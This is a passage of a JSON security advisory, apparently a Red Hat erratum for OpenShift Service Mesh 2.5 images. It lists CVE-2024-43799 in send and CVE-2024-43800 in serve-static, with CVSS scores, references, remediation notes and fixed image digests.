"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
